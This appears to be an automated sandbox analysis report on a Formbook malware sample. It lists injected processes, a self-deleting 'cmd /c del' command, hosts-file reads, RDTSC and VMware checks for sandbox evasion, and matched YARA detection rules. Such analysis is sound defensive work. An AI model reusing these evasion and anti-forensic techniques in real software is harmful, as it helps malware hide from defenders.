          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045BF9004_2_045BF900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D41204_2_045D4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0466FA2B4_2_0466FA2B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046822AE4_2_046822AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045DAB404_2_045DAB40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04682B284_2_04682B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467DBD24_2_0467DBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046703DA4_2_046703DA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045EEBB04_2_045EEBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B8FB4_2_02C1B8FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C02FB04_2_02C02FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C08C6C4_2_02C08C6C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C08C704_2_02C08C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C02D884_2_02C02D88
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1C58A4_2_02C1C58A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C02D904_2_02C02D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B57A4_2_02C1B57A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: String function: 00A0B150 appears 35 times
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 045BB150 appears 48 times
          Source: PQMW0W5h3X.exe, 00000000.00000003.330860083.00000000098B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PQMW0W5h3X.exe
          Source: PQMW0W5h3X.exe, 00000002.00000002.382278358.000000000265C000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs PQMW0W5h3X.exe
          Source: PQMW0W5h3X.exe, 00000002.00000002.381909590.0000000000AFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PQMW0W5h3X.exe
          Source: PQMW0W5h3X.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@14/8
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404292
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB978.tmpJump to behavior
          Source: PQMW0W5h3X.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: PQMW0W5h3X.exeVirustotal: Detection: 17%
          Source: PQMW0W5h3X.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile read: C:\Users\user\Desktop\PQMW0W5h3X.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess created: C:\Users\user\Desktop\PQMW0W5h3X.exe 'C:\Users\user\Desktop\PQMW0W5h3X.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'Jump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PQMW0W5h3X.exe, 00000000.00000003.330363976.00000000097A0000.00000004.00000001.sdmp, PQMW0W5h3X.exe, 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PQMW0W5h3X.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeUnpacked PE file: 2.2.PQMW0W5h3X.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,0_2_10001D3B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_100029F0 push eax; ret 0_2_10002A1E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004062F6 pushfd ; ret 2_2_004062F7
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B3C5 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004153FC push eax; retf 2_2_0041540B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B47C push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B412 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B41B push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00415CE7 pushad ; ret 2_2_00415D4B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041C4EE push 133511A3h; retf 2_2_0041C4F3
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00414D71 push ss; iretd 2_2_00414D72
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00415D38 pushad ; ret 2_2_00415D4B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A5D0D1 push ecx; ret 2_2_00A5D0E4
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004062F6 pushfd ; ret 2_1_004062F7
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041B3C5 push eax; ret 2_1_0041B418
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004153FC push eax; retf 2_1_0041540B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041B47C push eax; ret 2_1_0041B482
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041B412 push eax; ret 2_1_0041B418
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041B41B push eax; ret 2_1_0041B482
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00415CE7 pushad ; ret 2_1_00415D4B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041C4EE push 133511A3h; retf 2_1_0041C4F3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0460D0D1 push ecx; ret 4_2_0460D0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C062F6 pushfd ; ret 4_2_02C062F7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B3C5 push eax; ret 4_2_02C1B418
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C153FC push eax; retf 4_2_02C1540B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C15CE7 pushad ; ret 4_2_02C15D4B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1C4EE push 133511A3h; retf 4_2_02C1C4F3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B47C push eax; ret 4_2_02C1B482
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B412 push eax; ret 4_2_02C1B418
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C1B41B push eax; ret 4_2_02C1B482
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C14D71 push ss; iretd 4_2_02C14D72
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C15D38 pushad ; ret 4_2_02C15D4B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000002C085F4 second address: 0000000002C085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000002C0898E second address: 0000000002C08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Windows\explorer.exe TID: 6540Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: explorer.exe, 00000003.00000000.352759648.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.352726758.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.349159526.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.352726758.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.353071310.0000000008540000.00000004.00000001.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA-
          Source: explorer.exe, 00000003.00000000.349159526.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.353264391.0000000008674000.00000004.00000001.sdmpBinary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&-
          Source: explorer.exe, 00000003.00000000.352620265.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.352620265.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.352759648.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000003.00000000.348164098.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000000.337441844.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00409B30 LdrLoadDll,2_2_00409B30
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,0_2_10001D3B
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]2_2_00A320A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]2_2_00A320A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]2_2_00A320A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]2_2_00A320A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]2_2_00A320A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A0 mov eax, dword ptr fs:[00000030h]2_2_00A320A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A490AF mov eax, dword ptr fs:[00000030h]2_2_00A490AF
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]2_2_00A3F0BF
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3F0BF mov eax, dword ptr fs:[00000030h]2_2_00A3F0BF
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3F0BF mov eax, dword ptr fs:[00000030h]2_2_00A3F0BF
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A09080 mov eax, dword ptr fs:[00000030h]2_2_00A09080
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A83884 mov eax, dword ptr fs:[00000030h]2_2_00A83884
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A83884 mov eax, dword ptr fs:[00000030h]2_2_00A83884
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A058EC mov eax, dword ptr fs:[00000030h]2_2_00A058EC
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]2_2_00A9B8D0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00A9B8D0
